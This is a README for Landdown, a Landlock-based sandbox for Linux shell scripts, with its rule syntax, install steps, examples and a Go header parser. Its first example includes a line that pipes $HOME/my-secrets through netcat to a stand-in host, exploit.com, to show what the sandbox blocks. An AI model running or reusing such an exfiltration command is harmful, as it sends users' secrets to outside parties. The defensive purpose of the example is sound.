# Landdown - Simple shell script sandbox
Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with Landlock. Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example:
```sh
#!/usr/bin/env landdown
ro /bin
ro /lib
#!/bin/sh
# Following works
echo "Hi"
# Following fails
cat $HOME/my-secrets | nc exploit.com 1337
```
Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist.
The syntax is:
```
#!/usr/bin/env landdown
<rules...>
#!<interpreter>
<script content...>
```
# Supported rules
```
rof <file>
rwf <file>
ro <dir>
rw <dir>
bind <port>
connect <port>
```
Each rule can be used zero or more times.
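As an added example (not part of landdown's own code), a small Go parser for the header layout above; it assumes only the shebang and the six rule names shown here, and rejects unknown rules, relative paths and out-of-range ports rather than silently dropping them, since an allowlist that ignores a typo is no longer an allowlist.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// Rule is one allowlist entry from a landdown header, e.g. "ro /bin" or "connect 443".
type Rule struct{ Kind, Arg string }
// Script is the parsed landdown file: the rules, the real interpreter, and the body.
type Script struct{ Rules []Rule; Interpreter string; Body []string }

// ParseLanddown parses "#!/usr/bin/env landdown", zero or more rule lines, the
// interpreter shebang, then the script body (assumed layout from the README syntax).
func ParseLanddown(src string) (*Script, error) {
	lines := strings.Split(src, "\n")
	if strings.TrimSpace(lines[0]) != "#!/usr/bin/env landdown" {
		return nil, errors.New("first line must be '#!/usr/bin/env landdown'")
	}
	s := &Script{}
	for i, raw := range lines[1:] {
		f := strings.Fields(raw)
		switch {
		case len(f) == 0:
			continue // blank line between rules
		case strings.HasPrefix(f[0], "#!"): // interpreter shebang ends the rule section
			s.Interpreter = strings.TrimPrefix(strings.TrimSpace(raw), "#!")
			s.Body = lines[i+2:]
			return s, nil
		case len(f) != 2:
			return nil, fmt.Errorf("rule %q: expected '<kind> <arg>'", raw)
		}
		switch f[0] {
		case "rof", "rwf", "ro", "rw":
			if !strings.HasPrefix(f[1], "/") {
				return nil, fmt.Errorf("rule %q: path must be absolute", raw)
			}
		case "bind", "connect":
			if p, err := strconv.Atoi(f[1]); err != nil || p < 1 || p > 65535 {
				return nil, fmt.Errorf("rule %q: port must be 1-65535", raw)
			}
		default:
			return nil, fmt.Errorf("unknown rule %q", f[0])
		}
		s.Rules = append(s.Rules, Rule{f[0], f[1]})
	}
	return nil, errors.New("missing interpreter shebang after the rules")
}
```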
# Install
Generic install:
```sh
go install git.sr.ht/~marcc/landdown@latest
```
Arch Linux: AUR
# Examples
## Access a file
```sh
#!/usr/bin/env landdown
ro /bin
ro /lib
rwf /tmp/some-file.txt
#!/bin/sh
echo "Edit" > /tmp/some-file.txt
```
Try removing `rwf /tmp/some-file.txt` and the script should fail.
Note: the file needs to exist for landdown to work; run `touch /tmp/some-file.txt` to test.
## Network access
```sh
#!/usr/bin/env landdown
ro /bin
ro /lib
ro /etc/ssl
rof /etc/resolv.conf
connect 443
#!/bin/bash
curl https://www.google.com
```
Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` and it should fail. Network access needs to be explicitly set.
# Patches & Contributions
Contributions are welcome. Please send them to my public inbox.
# See also
- sh(1) - section on ulimit
- Good Practices
# Alternatives
- bubblewrap(1)
- firejail(1)
- landrun(1)
Landdown tries to be as frictionless and simple as possible, and specifically targets shell scripts rather than command line invocations.